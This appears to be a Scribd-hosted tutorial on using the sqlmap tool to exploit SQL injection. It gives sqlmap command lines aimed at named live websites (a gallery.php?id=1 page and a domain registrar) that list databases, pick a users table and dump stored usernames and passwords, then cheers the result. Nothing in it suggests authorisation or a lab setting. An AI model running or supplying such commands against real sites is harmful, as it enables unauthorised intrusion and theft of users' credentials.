Scribd
Upload
35 views

Sqlmaptut

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and accessing database servers. It has powerful detection abilities and can retrieve data from databases, access underlying file systems, and execute commands via out-of-band connections. The tutorial demonstrates how to use sqlmap to find databases and tables, identify columns, and dump data from a vulnerable site.

Uploaded by

yasiraltafzargar
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
35 views

Sqlmaptut

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and accessing database servers. It has powerful detection abilities and can retrieve data from databases, access underlying file systems, and execute commands via out-of-band connections. The tutorial demonstrates how to use sqlmap to find databases and tables, identify columns, and dump data from a vulnerable site.

Uploaded by

yasiraltafzargar
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
You are on page 1/ 3

Hello ZS, Welcome to my tutorial on sqlmap,

So lets start, About sqlmap:-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

download sqlmap from:-Here

It is coded in python and is the best tool available for sql injection!!!! it can be run even if you are on windows, first of all download python for windows from the official python site:-Here

i have installed it in:-C:\Documents and Settings\USER\sqlmap

now go to cmd prompt and type sqlmap\sqlmap.py

you should get something like "press enter to continue"!!!

sqlmap\sqlmap.py -u <website> then it will be:sqlmap\sqlmap.py -u http://www.dulcemaria.live.mx/gallery.php?id=1 sqlmap.py -u www.registrar.mw/index.php?domain=google.mw --dbs --threads=10

we use threads for sending 10 queries

to find databese type:sqlmap\sqlmap.py -u http://www.dulcemaria.live.mx/gallery.php?id=1 --dbs

i got two databases:1.dulcem 2.information_schema

to find tables from the database dulcem type:-

-u http://www.dulcemaria.live.mx/gallery.php?id=1 --tables -D dulcem

then we get many tables i'll chose:-dulcemaria_users

for finding columns from the tables dulcemaria_users type:-u http://www.dulcemaria.live.mx/gallery.php?id=1 --columns -T dulcemaria_users -D dulcem

if you want to dump all columns type:-u http://www.dulcemaria.live.mx/gallery.php?id=1 --tables -D dulcem --dumpall

i got three columns:1.id 2.password

3.user

to dump them type:-u http://www.dulcemaria.live.mx/gallery.php?id=1 --columns -T dulcemaria_users -D dulcem --dump

Cheers!....we have dumped the usernames and passwords to check them go to the path you installed sqlmap!!!

mine is:-C:\Documents and Settings\USER\sqlmap\output you will find a folder named output,you will have your dumped data there.

You might also like